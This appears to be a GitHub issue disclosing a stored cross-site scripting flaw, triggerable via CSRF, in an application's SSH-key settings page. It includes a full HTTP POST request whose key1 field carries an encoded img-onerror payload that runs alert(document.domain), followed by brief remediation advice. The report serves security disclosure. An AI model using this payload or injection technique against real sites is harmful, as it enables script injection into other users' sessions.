You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The admin panel of the application is vulnerable to a stored Cross-Site Scripting (XSS) attack, which can be triggered using Cross-Site Request Forgery (CSRF). This vulnerability allows an attacker to inject malicious code into the application and execute it within the context of authenticated users accessing the affected page.
By including a crafted key1 value in the HTTP POST request, an attacker can insert arbitrary JavaScript code into the application. The payload provided in the example request demonstrates an XSS attack by injecting a malicious image tag that executes a JavaScript alert function with the document.domain parameter:
POST /settings/sshkeys/add HTTP/1.1Host: localhost:8082User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 520Origin: http://localhost:8082Connection: closeReferer: http://localhost:8082/settings/sshkeys/addCookie: AUTHP_SESSION_ID=VxOOV1Fa24QR5Ka8DOdsiUiJJ4TwLrAceRxln4; access_token=abcdUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1DNT: 1Sec-GPC: 1key1=ssh-rsa+pub_key_rsaFi9wrf%2BM7Q%3D%3D+%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&comment1=&submit=
To remediate these vulnerabilities, see #264, additionally implement CSRF protection mechanisms to mitigate the risk of CSRF attacks.
The text was updated successfully, but these errors were encountered:
Severity: High
The admin panel of the application is vulnerable to a stored Cross-Site Scripting (XSS) attack, which can be triggered using Cross-Site Request Forgery (CSRF). This vulnerability allows an attacker to inject malicious code into the application and execute it within the context of authenticated users accessing the affected page.
By including a crafted
key1
value in the HTTP POST request, an attacker can insert arbitrary JavaScript code into the application. The payload provided in the example request demonstrates an XSS attack by injecting a malicious image tag that executes a JavaScript alert function with the document.domain parameter:To remediate these vulnerabilities, see #264, additionally implement CSRF protection mechanisms to mitigate the risk of CSRF attacks.
The text was updated successfully, but these errors were encountered: